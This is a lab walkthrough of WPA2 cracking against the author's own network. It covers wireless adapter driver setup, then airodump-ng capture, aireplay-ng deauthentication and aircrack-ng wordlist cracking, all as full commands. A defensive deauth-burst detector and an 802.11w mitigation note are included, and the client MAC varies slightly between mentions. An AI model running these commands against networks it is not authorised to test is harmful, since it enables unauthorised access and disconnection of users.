Summary: I will be gathering the Access Point MAC address and the MAC address of my phone. I will then send 10 deauthentication packets, which will cause my phone to disconnect and reauthenticate to the Access Point. We then capture the authentication process, save it locally and crack the password.
Do not hack into any networks without prior authorisation
Configure the Wireless Access point
If using the TP-Link TL-WN823N, follow this adapter setup; otherwise you can skip this section.
link: https://github.com/gnab/rtl8812au
Enter these commands in the terminal:
- sudo apt-get update
- sudo apt-get install linux-headers-$(uname -r)
- git clone https://github.com/gnab/rtl8812au
- cd rtl8812au
- make
- sudo insmod 8812au.ko
- sudo cp 8812au.ko /lib/modules/$(uname -r)/kernel/drivers/net/wireless
- sudo depmod
- sudo apt-get install build-essential dkms
- sudo make dkms_install
- echo 8192eu | sudo tee -a /etc/modules
Add the Wireless adapter to VirtualBox
- sudo airmon-ng check kill
Checks for conflicting processes and kills them. This will, however, cut off the VM's internet access; that can be restored by restarting.
- iwconfig
Shows the adapter names. In my case wlan0 is the wireless adapter.
- sudo airmon-ng start wlan0
Starts the wireless adapter in monitor mode.
- sudo airodump-ng -c 11 wlan0
Discovers access points on channel 11 using wlan0.
BSSID is the access point MAC address of the router. In this case we are looking at the BSSID for CyberSec
The MAC address of 0C:8D:CA:A6:94:8D is my phone and that is where the deauthentication packets are getting sent.
sudo airodump-ng -c 11 --bssid B0-95-75-5C-3B-94 -w psk wlan0
-c specifies the channel number to scan, in this case channel 11. --bssid is the MAC address of the Access Point. -w writes the output to a local file using the name given after it, in this case psk.
This captures packets for the CyberSec access point and saves them locally to a file named psk.
sudo aireplay-ng -0 10 -a B0:95:75:5C:3B:94 -c 0C:8D:CA:A6:93:8D wlan0
-0 sets the mode to deauth; alternatively this can be set by using --deauth instead. "10" sets the number of deauthentication packets sent. -a is the Access Point MAC address. -c is the client MAC address. wlan0 is the interface the command is being used on.
This sends 10 deauthentication packets to my phone, which will disconnect from the Access Point and automatically reconnect. The reauthentication process for the WPA2 handshake is captured and saved locally.
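A detection-side counterpart to the deauth step above, added here as an example and not part of the original write-up: it scans a list of 802.11 management-frame records and raises an alert when a burst of deauthentication frames is aimed at one client. The frame records, the threshold and the time window are constructed assumptions (the MACs are the ones used above), not output of airodump-ng or any real capture.

```python
# Added example: flag deauthentication bursts in a list of 802.11 frame records.
# The records below are constructed by hand (tuples of seconds, subtype, source
# MAC, destination MAC); they are not output of airodump-ng or any real capture.
from collections import defaultdict, deque

AP_MAC = "B0:95:75:5C:3B:94"        # access point MAC from the write-up
CLIENT_MAC = "0C:8D:CA:A6:93:8D"    # client MAC from the write-up
OTHER_CLIENT = "AA:BB:CC:DD:EE:01"  # placeholder MAC for a client that just left

SAMPLE_FRAMES = (
    [(0.00, "beacon", AP_MAC, "FF:FF:FF:FF:FF:FF")]
    # a single deauth for a client that simply left: expected, not an attack
    + [(0.50, "deauth", AP_MAC, OTHER_CLIENT)]
    # ten deauth frames to one client inside a second: the burst to detect
    + [(1.0 + 0.1 * i, "deauth", AP_MAC, CLIENT_MAC) for i in range(10)]
    # the client coming back, which is exactly what the capture above relies on
    + [(2.40, "auth", CLIENT_MAC, AP_MAC), (2.45, "assoc_req", CLIENT_MAC, AP_MAC)]
)

def normalise_mac(mac):
    """Accept both B0-95-... and B0:95:... spellings, as the aircrack tools do."""
    return mac.upper().replace("-", ":")

def detect_deauth_bursts(frames, threshold=5, window_s=2.0):
    """Return one alert per (client, sender) pair that receives at least
    `threshold` deauthentication frames within any `window_s` second window.
    Frames are processed in time order; only timestamps inside the window are kept."""
    recent = defaultdict(deque)   # (client, sender) -> timestamps still in window
    alerts, already = [], set()
    for ts, subtype, src, dst in sorted(frames, key=lambda f: f[0]):
        if subtype != "deauth":
            continue
        key = (normalise_mac(dst), normalise_mac(src))
        q = recent[key]
        q.append(ts)
        while ts - q[0] > window_s:   # drop timestamps that fell out of the window
            q.popleft()
        if len(q) >= threshold and key not in already:
            already.add(key)          # report each pair once, at the first crossing
            alerts.append({"client": key[0], "sender": key[1],
                           "count": len(q), "first": q[0], "last": ts})
    return alerts

if __name__ == "__main__":
    for a in detect_deauth_bursts(SAMPLE_FRAMES):
        print(f"deauth burst: {a['count']} frames to {a['client']} from "
              f"{a['sender']} between t={a['first']:.2f}s and t={a['last']:.2f}s")
```

The mitigation this detection complements is Management Frame Protection (802.11w) on the access point, which lets the client reject deauthentication frames that are not genuinely from the AP.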
Using the previous WPA2 handshake capture we can brute force the password using a password list. I created one called passwordlist with the password Password1 in it for lab demonstration purposes, but Kali has default wordlists in the /usr/share/wordlists directory.
aircrack-ng -w passwordlist.txt psk-02.cap
- This is what is used to crack the password.